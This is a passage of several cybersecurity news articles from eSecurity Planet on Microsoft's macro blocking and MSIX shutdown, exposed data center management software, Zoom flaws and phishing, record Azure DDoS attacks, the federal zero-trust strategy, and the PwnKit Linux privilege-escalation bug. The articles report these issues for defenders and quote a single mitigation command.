At the same time, the federal government is now adding another Microsoft flaw to its list of known vulnerabilities, giving federal agencies until Feb. 18 to patch a bug in all unpatched versions of Windows 10 and urging private and commercial organizations to remediate all flaws listed in its Known Exploited Vulnerabilities Catalog.

In its alert, the Cybersecurity and Infrastructure Security Agency (CISA) said the decision to add the flaw – tracked as CVE-2022-21882 – was “based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.”

“It appears CISA added this as due diligence, rather than because the attack is a high threat,” Mike Parkin, an engineer at cybersecurity vendor Vulcan Cyber, told eSecurity Planet. “Microsoft’s explanation indicates that the attack requires local access and is of high complexity, both of which reduce the likelihood of it being widely used in the wild. Patches are available and they should be deployed as part of any organization’s standard maintenance procedure.”

Also read: Best Patch Management Software

Disabling VBA Macros

One of the moves Microsoft officials announced this week is the plan to block Visual Basic for Applications (VBA) macros by default in a range of Office applications. The change is directed at VBA macros obtained from the internet. Users will no longer be able to enable certain content by a simple click of a button. If they try, a message bar will appear directing them to learn more about the situation.

“The default is more secure and is expected to keep more users safe including home users and information workers in managed organizations,” Kellie Eickmeyer, a principal program manager at Microsoft, wrote in a blog post. “For years Microsoft Office has shipped powerful automation capabilities called active content, the most common kind are macros. While we provided a notification bar to warn users about these macros, users could still decide to enable the macros by clicking a button.”

Threat actors can send macros in Office files to users who could easily enable them, causing malicious payloads to be delivered.

“The impact can be severe including malware, compromised identity, data loss, and remote access,” Eickmeyer wrote.

The change is part of a recent pattern by Microsoft, which has begun taking security into its own hands, as users can be slow to install critical patches (see Microsoft Makes Exchange Server Patches Less Optional).

Security By Default

The change will begin rolling out in Version 2203, starting with the preview of Current Channel in early April and later in other update channels, such as Current Channel, Monthly Enterprise Channel and Semi-Annual Enterprise Channel. It will impact Office on devices that are running Windows and affects Access, Excel, PowerPoint, Word and Visio.

Security professionals applauded Microsoft’s decision.

“One of the important but underappreciated aspects of cybersecurity is that defaults matter – and sometimes matter a lot,” Oliver Tavakoli, CTO at cybersecurity firm Vectra, told eSecurity Planet. “Seemingly 50-50 decisions made by product managers at application and platform providers can expose their customers to extraordinary risk. As the example of VBA macros demonstrates, once such a choice has been made, it’s a difficult and lengthy process to change the default to something more secure as the fear of breaking things creates a form of institutional paralysis.”

The equation is a simple one, Tavakoli said: “Leave features which may have security implications off by default and let customers choose whether the benefit of the feature outweighs the security risk of having it on.”

Overdue Security Change

Ray Kelly, a Fellow at NTT Application Security, told eSecurity Planet that “VBA macros have been a target for hackers for over two decades, easy to code and run with the current users’ permissions. Blocking macros by default is a good move at the cost of inconvenience and can potentially protect a user from ransomware or data loss.”

Jon Gaines, senior application security consultant at nVisium, noted that for red teams at many organizations, macros have been a useful tool in security training. He also dinged Microsoft for taking too long to disable VBA macros.

“Macros have been a threat to Office users for many years,” Gaines told eSecurity Planet. “Good on [Microsoft] for finally implementing this, but I don’t think it gets end users out of danger completely. It’s important to note that this only affects Office files downloaded from the internet, which have already had a warning if it contains a macro at this time. However, making it more than one click to execute the macros is a great step.”

Also read: Top Secure Email Gateway Solutions

Temporary Shutdown for MSIX

Late last week, Microsoft also announced it was temporarily turning off the MSIX ms-appinstaller protocol handler in its Windows AppX Installer after learning that a security flaw was being exploited by cybercriminals to deliver such malware as Emotet (a Trojan spread via emails), TrickBot (a banking Trojan) and Bazaloader (which can result in stolen data or ransomware).

In a blog post, Dian Hartono, a program manager at Microsoft, wrote that the vendor learned an attacker could spoof App Installer to install a package that a user didn’t want to install. The vulnerability is being tracked as CVE-2021-43890.

“We are actively working to address this vulnerability,” Hartono wrote. “For now, we have disabled the ms-appinstaller scheme (protocol). This means that App Installer will not be able to install an app directly from a web server. Instead, users will need to first download the app to their device, and then install the package with App Installer. This may increase the download size for some packages.”

With the MSIX app package, some legacy Windows applications can get “modern packaging and deployment features,” giving enterprises a way to ensure their applications are up-to-date and ensure an easy installation process.

“The ms-appinstaller protocol handler was introduced to enable users to seamlessly install an application by simply clicking a link on a website,” Hartono wrote. “What this protocol handler provides is a way for users to install an app without needing to download the entire MSIX package. This experience is popular, and we are thrilled that it has been adopted by so many people today.”

The protocol will be re-enabled after ensuring it is secure. Microsoft is considering bringing in a group policy that will enable IT administrators to re-enable the protocol and control its use inside their organizations.

Read next: Top Vulnerability Management Tools

The post Microsoft Blocks VBA Macros by Default, Temporarily Shuts Down MSIX Protocol appeared first on eSecurity Planet.

Researchers with cybersecurity firm Cyble this week said that along with the public-facing data center infrastructure management (DCIM) software, they also found intelligent monitoring devices, thermal cooling management and power monitors for racks vulnerable to cyberattacks.

The discovery of the more than 20,000 DCIM software instances and products exposed to the internet makes it highly likely that there will be “increasing cyber threats towards data centers worldwide,” investigators with Cyble Research Labs wrote in a blog post.

“Globally data centers are becoming faster, smarter, and highly scalable but this development comes at a price, as with great power comes significant responsibilities and greater risks of cyberattacks,” they wrote. “As data centers work with the collaboration of multiple technologies and software, vulnerabilities and loopholes can be easily found by malicious hackers. Moreover, data centers are rapidly upgrading. Hence hackers are exploring new vectors to bypass the security parameters.”

See also: Top Vulnerability Management Tools

Growing Presence of DCIM Software

DCIM is becoming an increasingly important part of data center management. The software tools address both IT and facilities operations, managing and controlling such data center components as servers, storage, routers and switches, along with heating, ventilation and cooling (HVAC) systems, uninterruptible power supply (UPS) systems, sensors, transfer switches – used to redirect a power load to an alternate source – and server rack monitoring solutions.

According to market research firm KVB Research, the global DCIM market is expected to grow an average of 21.7 percent a year through 2026, when it will hit $4.4 billion. The analysts wrote that the rising demand for data center virtualization, the ongoing migration of business into private clouds and the drive to improve cost efficiencies within the data center are helping to fuel the market growth.

Because of the reach DCIM software has in data centers, it is getting the attention of threat actors, according to the Cyble researchers. For example, hacktivists could launch an attack on a specific data center’s HVAC system in retaliation for some actions by a person or group connected to the facility. Ransomware gangs could block IT and facilities managers from DCIM applications and demand money to regain access, and hackers could get access to highly sensitive data.

State-sponsored groups could disrupt power to critical data center components and cause a shutdown of the site, they wrote.

“Data centers are the most important critical infrastructure for the nation and the organization using the data center facilities,” the researchers wrote. “A successful attack on this vital sector can lead to the loss of a considerable amount of money. The data stored and processed in the data centers can be corrupted and destroyed, which can cause a severe impact on the organization’s brand reputation. Hackers can even delete the traces of their attack by deleting the logs from … web consoles.”

Also read: Critical Infrastructure Protection: Physical and Cyber Security Both Matter

Public-Facing Software a Threat

Data centers also use many products from various vendors, which increases the scope of attack for cybercriminals. Security professionals told eSecurity Planet that allowing these applications to be exposed to the internet is a dangerous move by data center operators and vendors alike.

“There can be no real security if physical security of a system is compromised,” said John Bambenek, principal threat hunter for cybersecurity company Netenrich. “These systems provide attackers a good deal of insight into the physical layer of data center operations and, in some cases, allow them to make changes that can compromise the underlying systems. It’s been a best practice not to put things on the Internet, accessible to the world and protected by default credentials since the ’90s. This is laziness at its worst.”

‘Exposing that to the public internet is like allowing terrorists to direct air traffic control’

Sounil Yu, CISO for cybersecurity vendor JupiterOne, said that “It’s easy to lose sight of these applications without a good asset management program. It’s worse with DCIM tools, since they are part of one’s control plane. Exposing that to the public internet is like allowing terrorists to direct air traffic control.”

See also: Top IT Asset Management Tools for Security

APC by Schneider, Sunbird, Liebert on List

Cyble’s researchers said they detected instances of software from Sunbird, Liebert, APC by Schneider, Vertiv and Device42 that could be accessed by threat actors on the outside. APC by Schneider accounted for more than half the public-facing instances found by the researchers.

They also found instances of public-facing software from Device42, Liebert’s CRV-iCOM cooling solution and smart UPS still running factory default passwords. They were “able to find several instances exposed over the internet while investigating the scope of attacks on data centers all over the globe. Default passwords protected these data centers. Some of the products found were outdated, allowing hackers or malicious groups to exploit the data center’s systems further.”

In addition to building and room security, monitoring server racks are critical as data storage, and processing equipment are installed in racks, the researchers noted. “A change in external parameters could cause severe damage,” they said. “For example, an increase in temperature might cause the chips inside to melt and bring the entire system to a halt. Furthermore, the chips’ processing power slows down and loses efficiency if they run too cold.”

They found multiple exposed web interfaces used for rack monitoring, with the interfaces using default passwords, “making it easy for a hacker to gain insights into a data center. As there are multiple sensors, power units, networking devices, CCTV cameras connected to these portals, there is a lot of scope for a hacker to gain sensitive information about the components within the data center and their working.”

Reconsider Web Exposure

The Cyble researchers noted that even organizations that are already spending millions of dollars to protect their data centers and ensure there are no downtimes or security breaches need to take a holistic view of their facilities and look for openings that threat actors could exploit.

Enterprises need to adopt a risk management framework, such as the RMF framework from NIST, as well as embrace security awareness programs, path vulnerabilities, implement access controls on connected systems, launch network segmentation efforts and run regular audits. The researchers also urged strong password policies, vulnerability assessment programs and using threat intelligence.

And reconsider using applications and instances exposed to the internet.

“Public-facing web instances are a significant threat for the critical sectors which go unaddressed by the security teams,” they wrote. “Doing so puts the complete environment at risk of cyber-attack. Checking assets exposure is very important in these sectors.”

Read next: How to Use MITRE ATT&CK to Understand Attacker Behavior

The post Thousands of Data Center Management Apps Exposed to Internet appeared first on eSecurity Planet.

The sharp increase in demand put a focus on security shortcomings in Zoom’s architecture – “Zoombombing” became a thing – that the company was quick to address.

But recent reports by security researchers highlight not only other vulnerabilities in Zoom’s offerings, but also the threat that the connected nature of cloud-based collaboration technologies pose. And with a hybrid workforce that’s likely here to stay, these issues raise bigger questions about security practices in a widely distributed workforce.

A Focus on Zoom

Earlier this month, Natalie Silvanovich, a researcher with Google’s Project Zero bug-hunting initiative, published an analysis of two zero-click vulnerabilities in the video conferencing platform that could have enabled threat actors to take control of a victim’s Zoom clients and multimedia routers (MMRs).

A little more than a week later, cybersecurity firm Armorblox outlined an account takeover attack that leveraged malicious phishing and social engineering.

In Armorblox’s case, Zoom itself wasn’t compromised. Instead, its wide-ranging use by enterprises convinced threat actors to use emails with spoofed addresses to entice victims to unknowingly download a malicious payload.

“With Zoom becoming one of the most prevalent tools for businesses to connect via video conferencing, attackers seized the opportunity to target users with a malicious phishing scam … with the goal of stealing victims’ Microsoft Teams account credentials,” Lauryn Cash, product marketing manager at Armorblox, wrote in a blog post.

Also read:

• Remote Work Security: Priorities & Projects
• Secure Access for Remote Workers: RDP, VPN & VDI
• Best Zero Trust Security Solutions

Vulnerabilities Found on Platform

In her analysis, Project Zero’s Silvanovich noted that with many other video conferencing platforms, one user will initiate a call that others immediately accept or reject. But Zoom calls are usually scheduled in advance and users join through an email invitation.

“In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user,” she wrote. “However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface.”

Her own investigation found two vulnerabilities, including a buffer overflow that impacted both clients and MMR servers. Another was an information leak that can be used by attackers on MMR servers. Hackers attacking the flaw could target Zoom accounts through connections with Zoom Contacts.

Both vulnerabilities were reported to Zoom, which fixed them on Nov. 24.

Flaws on MMR Servers a Concern

Silvanovich wrote that the vulnerabilities in Zoom’s MMR servers were particularly concerning. The servers process meeting audio and video content, which means that an attacker who compromised the system could monitor any Zoom meetings that didn’t have end-to-end encryption. The servers also lacked address space layout randomization (ASLR), which would make it easier for a threat actor to exploit memory corruption vulnerabilities.

Zoom recently enabled it, she wrote. Still, it was a concern that ASLR hadn’t already been enabled.

“ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective,” Silvanovich wrote. “There is no good reason for it to be disabled in the vast majority of software. … All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.”

Zoom’s Broad Use Leveraged in Phishing Attempt

In Armoblox’s research, hackers used email with a socially engineered payload. The attackers tried to spoof the email address and replicate the subject line of a legitimate email from Zoom.

“The email took advantage of the end users’ natural instinct (in any Zoom call) to start the meeting,” Armorblox’s Cash wrote. “When the user clicked on the link to start the meeting, they fell into the trap of the malicious attack and were navigated to a landing page that mimics a Microsoft Outlook login screen.”

The email was able to bypass Microsoft email security controls, she wrote. The emails were able to skip spam filtering because Microsoft’s controls determined they were from a safe sender, to a safe recipient or were from an email source server on the IP Allow List.

About 10,000 emails were sent to an online mortgage brokerage company in North America, according to Armorblox.

Ubiquitous Adoption at Issue

“The ubiquitous adoption of Zoom as the preferred tool for remote collaboration was used by the malicious actor to socially engineer and email as a trusted sender,” Cash wrote. “The specific call to action (CTA), ‘Start Meeting,’ was strategically used due to it being a common business workflow carried out every day.”

That ubiquitous nature and the broad reach within enterprise should not be overlooked as part of the attack surface, according to cybersecurity professionals.

“Zoom accounts and users don’t exist in isolation,” Erkang Zheng, founder and CEO of asset management platform vendor JupiterOne, told eSecurity Planet. “Instead, they’re cyber assets and should be viewed in the context of direct and indirect relationships. A single Zoom account might only be used by one employee; however, that employee is connected to countless other cyber assets, such as Microsoft Teams, devices, cloud resources and sensitive data repositories.”

Zoom, Customers Must Address Risks

Oliver Tavakoli, CTO at cybersecurity vendor Vectra, said many collaboration platforms in many ways are relatively new, making them less familiar to security professionals at companies.

“Tools which organizations use to conduct normal business have always been targets for attackers as any odious activity within such communication channels tends to intermingle with normal traffic patterns,” Tavakoli told eSecurity Planet. “Collaboration platforms, such as Zoom, which during the pandemic have become more central to how businesses operate, are poorly understood by security teams in terms of the attack surface they present. These tools are also relatively immature in terms of accompanying security protections provided by third parties.”

He said it’s incumbent on vendors like Zoom to put more effort into providing greater security controls to lock down their environments and to add more telemetry to monitor it and block attacks.

Social Engineering Not Going Away

Hank Schless, senior manager of security solutions at cybersecurity vendor Lookout, also warned that social engineering will remain a significant challenge for IT and security teams because it not only works for the bad actors but they’re also getting better at it.

“Threat actors know that social engineering is most effective on personal channels such as social media, third-party messaging apps, and even dating apps,” Schless told eSecurity Planet. “Organizations that allow employees to use their own smartphones and tablets for work in a bring-your-own-device [BYOD] scenario are at even greater risk, as employees have both personal and work apps on those devices.”

Applications like Zoom also will continue to be a problem as hackers are increasingly using fake links to commonly used platforms as foundational to phishing campaigns.

“In the age of hybrid work, we’ve been conditioned to automatically click into any link from Zoom, Google Docs, Microsoft Office and more,” he said. “Attackers know this and use the inherent trust we have in seeing those names against us.”

Read next: The Best Wi-Fi 6 Routers Secure and Fast Enough for Business

The post Zoom Security Issues Are a Wakeup Call for Enterprises appeared first on eSecurity Planet.

The enterprise software and cloud giant said in a blog post this week that during the last six months of the year, there was a 40 percent increase in the number of DDoS attacks worldwide over the first half of 2021, with an average of 1,955 attacks per day and a maximum of 4,296 on Aug. 10. Microsoft itself mitigated 359,713 unique attacks against its infrastructure between July and December, a 43 percent jump from the first half of 2021.

In addition, the DDoS activity also was unprecedented in its complexity and frequency, Anupam Vij, principal PM manager, and Syed Pasha, principal network engineer, both with Azure Networking, wrote in the blog post.

They noted that the “availability of DDoS for-hire services as well as the cheap costs – at only approximately $300 USD per month – make it extremely easy for anyone to conduct targeted DDoS attacks.”

New Record Attack

Azure officials in October reported that they were able to mitigate a 2.4 terabit-per-second DDoS attack against a European cloud customer that originated in the Asia-Pacific region. That attack was 140 percent larger than a 1 Tbps attack in 2020 and larger than any similar event ever detected on the Azure public cloud, they said.

Since then, Azure was able to stave off three larger attacks, including one in November that hit a throughput of 3.47 Tbps and had a packet rate of 240 million packets per second (pps). It targeted an Azure customer in Asia.

“This was a distributed attack originating from approximately 10,000 sources and from multiple countries across the globe, including the United States, China, South Korea, Russia, Thailand, India, Vietnam, Iran, Indonesia, and Taiwan,” Vii and Pasha wrote.

The DDoS assault used multiple attack vectors for User Datagram Protocol (UDP) reflection, including Simple Service Discovery Protocol (SSDP), Connection-less Lightweight Directory Access Protocol (CLDAP), Domain Name System (DNS), and Network Time Protocol (NTP). There was one peak in the attack, which lasted about 15 minutes.

Also read: How to Stop DDoS Attacks: 6 Tips for Fighting DDoS Attacks

Two Other Big DDoS Attacks

There also were two other large attacks in December, including a UDP attack in Asia that reached 3.25 Tbps and lasted more than 15 minutes and included four main peaks, with the highest reaching the 3.25 Tbps mark. A second peak hit 2.54 Tbps. The other attack was a 2.55 Tbps UDP flood that lasted just over five minutes.

The attacks were part of a larger and changing DDoS landscape that not only is seeing rapidly increasing numbers of incidents but also greater sophistication and a shift away from times when such incidents typically occur.

“Interestingly, there was not as much of a concentration of attacks during the end-of-year holiday season compared to previous years,” they wrote. “We saw more attacks in Q3 than in Q4, with the most occurring in August, which may indicate a shift towards attackers acting all year round – no longer is holiday season the proverbial DDoS season! This highlights the importance of DDoS protection all year round, and not just during peak traffic seasons.”

See the Top DDoS Protection Service Providers for 2022

Time and Intensity Increase

There also was a rise in the second half of the year in the number of attacks that lasted longer than an hour. As in the first six months, most attacks were short-lived. However, the number of attacks in the second half of 2021 that were 30 minutes or less accounted for 57 percent of all incidents, down from 74 percent. Meanwhile, those lasting more than an hour made up 27% of attacks, more than twice the 13 percent in the first half of the year.

“It’s important to note that for longer attacks, each attack is typically experienced by customers as a sequence of multiple short, repeated burst attacks,” Vii and Pasha wrote. “One such example would be the 3.25 Tbps attack mitigated, which was the aggregation of four consecutive short-lived bursts that each ramped up in seconds to terabit volumes.”

Gaming Industry a Top DDoS Target

The gaming industry is most targeted by DDoS attacks, but Microsoft is finding that other industries – including financial institutions, media, internet service providers (ISPs), retailers and supply-chain companies – are seeing an increase in such incidents.

UDP attacks accounted for 55 percent of all DDoS campaigns – a 16 percent increase over the first half of 2021 – and UDP is commonly used in gaming and streaming applications.

“UDP is commonly used in gaming and streaming applications,” they wrote. “The majority of attacks on the gaming industry have been mutations of the Mirai botnet and low-volume UDP protocol attacks. An overwhelming majority were UDP spoof floods, while a small portion were UDP reflection and amplification attacks, mostly SSDP, Memcached, and NTP.”

In addition, while the United States continues to be the top target, sustaining 54 percent of attacks, there was a spike in attacks in India – from 2 percent to 23 percent – and there was a drop in Europe, from 19 percent in the first half to 6 percent in the second.

IoT Devices Multiply Attacks

There are multiple reasons for the uptick and growing sophistication of DDoS attacks. As Vii and Pasha noted, the rise of inexpensive DDoS services – giving even the least experienced of threat actors a cheap way to launch such attacks – are a factor. In addition, the proliferation of Internet of Things (IoT) devices is giving hackers a large number of targets to be hijacked and absorbed into a botnet that can then be used in increasingly larger DDoS attacks.

“DDoS attacks are increasing in both volume and force due to the enormous number of vulnerable IoT devices that cyber criminals leverage to create botnets,” Bud Broomhead, CEO of cybersecurity firm Viakoo, told eSecurity Planet. “IoT vulnerabilities must be quickly remediated in order to eradicate the risk of them being used in cyberattacks.”

Cybersecurity firm CrowdStrike this month released a report noting a 35 percent year-over-year increase in 2021 of malware targeting Linux-based IoT devices, with the primary goal of compromising the devices and pulling them into a botnet for use in DDoS attacks. Other companies, such as Kaspersky and NetScout, also have reported rises in DDoS attacks over the past year.

See the Top IoT Security Solutions

Skilled Adversaries Raise Stakes

“DDoS attacks remain a persistent, malicious technique regularly used by countless threat actors,” Stefano De Blasi, cyber threat intelligence analyst at Digital Shadows, told eSecurity Planet. “Although DDoS attacks are frequently associated with technically unsophisticated attackers, these events remind us that highly skilled adversaries can mount high-intensity operations that may result in severe consequences for their targets.”

De Blasi said there are a range of motivations behind such attacks, which typically aim to temporarily disrupt a target’s infrastructure or act as a decoy for more dangerous activity.

“However, attacks like the ones reported by Microsoft are a powerful reminder that some DDoS attacks can have a significant impact standing on their own,” he said. “In fact, organizations affected by high-intensity DDoS attacks may experience a long-time interruption of business, which may cause financial loss, brand or reputational damage and influence customer trust.”

Yehuda Rosen, senior software engineer at cybersecurity company nVisium, told eSecurity Planet that while DDoS “is a nuisance for most companies,” it can be more dangerous when it involves mission critical services, including traffic lights, medical charts and water pumps.

“Ransomware attacks can be avoided by simply following best practices around information security, backups, and updates, but DDoS can occur despite doing everything correctly,” Rosen said. “Even the best DDoS-protection companies aren’t immune to attacks such as these.”

Read next: Cybersecurity Outlook 2022: Third-Party, Ransomware and AI Attacks Will Get Worse

The post Microsoft Fights Off Another Record DDoS Attack as Incidents Soar appeared first on eSecurity Planet.

According to the White House order, agencies have until the end of the government’s fiscal year 2024 to reach the target goals laid out in the strategy and based on a zero-trust model developed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

The 29-page memorandum from Acting OBM Director Shalanda Young comes less than a year after President Biden issued his executive order calling for the improvement of the government’s cybersecurity posture in the wake of a series of attacks that impacted agencies and endangered critical infrastructure, including those on SolarWinds and Colonial Pipeline.

An initial draft of the plan was released in September to gather public input, including from the cybersecurity industry.

“In the current threat environment, the Federal Government can no longer depend on conventional perimeter-based defenses to protect critical systems and data,” Young wrote. “A transition to a ‘zero trust’ approach to security provides a defensible architecture for this new environment. … It is a dramatic paradigm shift in philosophy of how we secure our infrastructure, networks, and data, from verify once at the perimeter to continual verification of each user, device, application, and transaction.”

See the Best Zero Trust Security Solutions

Zero Trust Gains Momentum

Zero-trust architecture efforts have gained momentum in an IT environment that is increasingly distributed and mobile, located not only within corporate data centers but increasingly spread among mobile devices, the cloud and the edge.

Central to a zero-trust architecture is the premise that anything and anyone trying to access a network or infrastructure cannot be trusted and must be verified, and that they must be continuously verified throughout the transaction – and given access to no more than the resources they need. Microsegmentation has been one of the critical tools used to achieve zero trust, carving networks into small segments to limit risk.

Zero trust is a fast-growing security technology, with KBY Research analysts predicting the market will grow an average of 18.8 percent a year through 2026, when it will hit $54.6 billion.

Also read: How to Implement Microsegmentation

Support for Zero Trust

The government’s embrace of a zero-trust strategy was applauded by many in the cybersecurity field.

“Zero trust is becoming table stakes for organizations to protect themselves online,” John Engates, field CTO for Cloudflare, a web infrastructure and security company, told eSecurity Planet. The “directive from the White House signals that the federal government is taking cybersecurity threats seriously and is adopting a strategy that will better protect the nation’s cyber infrastructure, and by extension, United States national security. Zero trust shouldn’t be seen as just another product or industry buzzword – it’s a fundamental shift in security philosophy.”

Zero trust is a fundamental shift in security philosophy

The FIDO Alliance, an open industry alliance aimed at creating improved authentication technologies that reduce the reliance on passwords, also endorsed the government’s zero-trust strategy, with alliance Executive Director Andrew Shikiar in a statement zeroing in on the requirement for using phishing-resistant authentication tools to protect against phishing attacks, with some becoming sophisticated enough to get around such even multi-factor authentication (MFA) technologies.

Tim Erlin, vice president of strategy at cybersecurity vendor Tripwire, told eSecurity Planet that shifting the entire government to a zero-trust architecture is an important but difficult task. That said, the strategy falls short in a couple of crucial ways.

“It’s unfortunate that this memorandum doesn’t provide a clearer role for what NIST identifies as one of the key tenets for zero trust: integrity monitoring,” Erlin said. “Documents from both CISA and NIST include integrity monitoring as a key component of zero trust, but the OMB memorandum doesn’t include similar treatment.”

He also said that focusing so much on endpoint detection and response (EDR) – which is evolving into managed detection and response (MDR) and extended detection and response (XDR) – may create an over-reliance on a technology that is already morphing into something newer and more comprehensive.

Verification Over Trust

According to the OMB memorandum, the goal is to get to a point where employees have enterprise-managed accounts that give them access to the applications and data they need while protecting them from outside threats, where the devices they use are consistently tracked and monitored, and where agency systems are isolated from each other.

In addition, enterprise applications will be tested internally and externally and made available in a secure manner over the internet.

“A key tenet of a zero trust architecture is that no network is implicitly considered trusted – a principle that may be at odds with some agencies’ current approach to securing networks and associated systems,” Young wrote. “All traffic must be encrypted and authenticated as soon as practicable.”

The strategy will rely on five complementary pillars outlined in a zero-trust maturity model developed by CISA. The strategic goals include:

• enterprise-managed identities to access applications
• a complete inventory of devices authorized and used
• the ability to respond to and prevent incidents on those devices
• networks encrypting all DNS requests and HTTP traffic
• creating isolated environments

In addition, all applications will be treated as internet-connected and consistently tested, and agencies will use data categorization as well as leverage cloud security services to monitor access to sensitive data. There also will be enterprise-wide logging and information-sharing.

See also: CNAP Platforms: The Next Evolution of Cloud Security

Fast Tracking Cybersecurity

Government agencies now have 30 days to designate a lead for implementing the strategy within their organization and 60 days to submit an implementation plan to OMB.

“While the concepts behind zero trust architectures are not new, the implications of shifting away from ‘trusted networks’ are new to most enterprises, including many agencies,” Young wrote. “This process will be a journey for the Federal Government, and there will be learning and adjustments along the way as agencies adapt to new practices and technologies.”

CISA Director Jen Easterly said in a statement that “as our adversaries continue to pursue innovative ways to breach our infrastructure, we must continue to fundamentally transform our approach to federal cybersecurity. Zero trust is a key element of this effort to modernize and strengthen our defenses. CISA will continue to provide technical support and operational expertise to agencies as we strive to achieve a shared baseline of maturity.”

Government officials pointed to attempts by state-sponsored and other hacking groups to exploit the flaw recently found in Log4j as the latest example of threat actors trying to leverage new ways to get in the networks and other infrastructure of targets. The vulnerability – dubbed Log4Shell – is a significant threat because the Java logging tool is free and widely distributed, exposing large numbers of servers and cloud services to a vulnerability that is easily exploitable. Threat intelligence experts have found numerous incidents of cybercriminal groups trying to find ways to exploit the flaw since knowledge of it became public in early December.

Read next: Top Vulnerability Management Tools

The post White House Boosts Zero Trust with New Cybersecurity Strategy appeared first on eSecurity Planet.

Researchers at cybersecurity vendor Qualys this week disclosed the memory corruption vulnerability in polkit’s pkexec, which if exploited by a bad actor can enable an unprivileged user to gain full root privileges on a system, giving the unprivileged user administrative rights.

The vulnerability, tracked as CVE-2021-4034, has “been hiding in plain sight” for more than 12 years and infects all versions of polkit’s pkexec since it was first developed in 2009, Bharat Jogi, director of vulnerability and threat research at Qualys, wrote in a blog post.

Polkit’s (formerly PolicyKit) pkexec is a component used to control system-wide privileges in Unix-like operating systems, enabling non-privileged processes to communicate with privileged processes in an organized fashion. It also can be used to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed with root permission.

The flaw can’t be exploited remotely, but if an attacker can log in as any unprivileged user, the vulnerability can be quickly exploited, according to Qualys. Red Hat rated the severity of the flaw a 7.8 out of 10 on the CVSS scale.

See also: Top Vulnerability Management Tools

Every Linux Distribution is Vulnerable

The pkexec component is widely used; it’s installed as a default in every major Linux distribution and Qualys was able to verify the vulnerability, develop an exploit and gain full root privileges on installations of Ubuntu, Debian, Fedora and CenOS, Jogi wrote, adding that “other Linux distributions are likely vulnerable and probably exploitable.”

He wrote that Qualys won’t publish exploit code for the vulnerability – dubbed PwnKit – but said that “given how easy it is to exploit the vulnerability, we anticipate public exploits to become available within a few days of this blog’s post date.”

Vulnerabilities like PwnKit – which have been present for more than a decade and are ubiquitous in Linux distributions and, therefore, enterprises – pose a significant challenge for security teams, according to Greg Fitzgerald, co-founder and chief experience officer for cybersecurity firm Sevco Security. The priority for organizations should be to patch their Linux machines, but it’s not an easy task.

“That’s all well and good for the machines that IT and security teams know about, but there are not many companies with an accurate IT asset inventory that dates back more than a decade,” Fitzgerald told eSecurity Planet. “The unfortunate reality is that many organizations that patch all of the machines they’re aware of will still be susceptible to this vulnerability because they do not have an accurate inventory of their IT assets. You can’t apply a patch to an asset you don’t know is on your network. Abandoned and unknown IT assets are often the path of least resistance for malicious actors trying to access your network or data.”

See also: Top IT Asset Management Tools for Security

Patching Open-Source Systems a Challenge

Bud Broomhead, CEO of cybersecurity company VIakoo, told eSecurity Planet that patching a flaw on open-source systems can be challenging for enterprises.

‘a single open-source vulnerability can be present in multiple systems’

“Unlike fully proprietary systems where a single manufacturer can issue a single patch to address a vulnerability, a single open-source vulnerability can be present in multiple systems – including proprietary ones – which then requires multiple manufacturers to separately develop, test and distribute a patch,” Broomhead said. “For both the manufacturer and end user, this adds enormous time and complexity to implementing a security fix for a known vulnerability.”

Yaniv Bar-Dayan, co-founder and CEO of Vulcan Cyber, said that a vulnerability that gives root access on a Linux system is bad, but that “fortunately, this vulnerability is a local exploit, which mitigates some risk. Until patches are broadly available, SysAdmins can remove the SUID bit from pkexec – using: # chmod 0755 /usr/bin/pkexec  — to temporarily mitigate the problem.”

Also read: Best Patch Management Software

Flaw Found in November

Qualys discovered the vulnerability in November 2021 and notified Red Hat. This week the announcement of PwnKit was made in coordination with Red Hat and other distributors.

“Given the breadth of the attack surface for this vulnerability across both Linux and non-Linux OS, Qualys recommends that users apply patches for this vulnerability immediately,” Jogi wrote. “We expect vendors to release patches for this vulnerability in the short term. Qualys Patch Management can be used to deploy those patches to vulnerable assets, when available.”

The PwnKit flaw comes in the wake of other recent disclosures about security issues involving open-source software. At the top of the list is the critical remote execution flaw in Log4j – the flaw is dubbed Log4Shell – that was revealed in December and has been targeted by state-sponsored hacking groups looking to leverage the vulnerability to stage attacks.

In the Wake of Log4j

Like polkit’s pkexec, Log4j – a Java logging tool – has broad enterprise use across data centers and cloud-based services that could be exposed to the zero-day vulnerability. Log4j is a free and widely distributed open-source tool from the Apache Software Foundation and the flaw affects versions 2.0 through 2.14.1. Log4Shell is tracked as CVE-2021-44228.

In addition, a report released this month by CrowdStrike found that incidents of malware targeting Linux-based Internet of Things (IoT) devices grew by more than a third year-to-year in 2021, with the primary goal being to compromise the devices, pull them into botnets and use them for distributed denial-of-service (DDoS) attacks.

“With various Linux builds and distributions at the heart of cloud infrastructures, mobile and IoT, it presents a massive opportunity for threat actors,” a CrowdStrike researcher wrote in a blog post.

Open Source in the Crosshairs

“Threat actors find open-source systems extremely attractive,” Viakoo’s Broomhead said. “Vulnerabilities that exploit open-source systems – like the recent Log4j vulnerability – require patches and updates to be developed by multiple device or system manufacturers, and threat actors are betting on some manufacturers being slow in releasing fixes and some end users being slow in updating their devices.”

He said what enterprises need is a software bill of materials to make finding vulnerable systems easier, automated deployment of security fixes and extending the zero-trust architecture to IoT and operational technology (OT) systems, which “can add additional security to prevent vulnerabilities from being exploited.”

Vulcan Cyber’s Bar-Dayan said the “open-source software model is a two-edged blade. On one side, everyone can look at the code and audit it to identify and patch vulnerabilities. On the other side, threat actors can look at the code and find subtle issues that everyone else has missed. The advantages of this model have historically outweighed the disadvantages, with many eyes on the code and patches frequently appearing very rapidly after a vulnerability comes to light.”

Improved auditing will help catch and correct vulnerabilities before they are used in the wild, and improved integration with vulnerability and patch management tools will make OSS-based systems even more secure and easy to maintain, he said.

Also read:

13 Best Vulnerability Scanner Tools

Top Open Source Security Tools

The post Easily Exploitable Linux Flaw Exposes All Distributions: Qualys appeared first on eSecurity Planet.

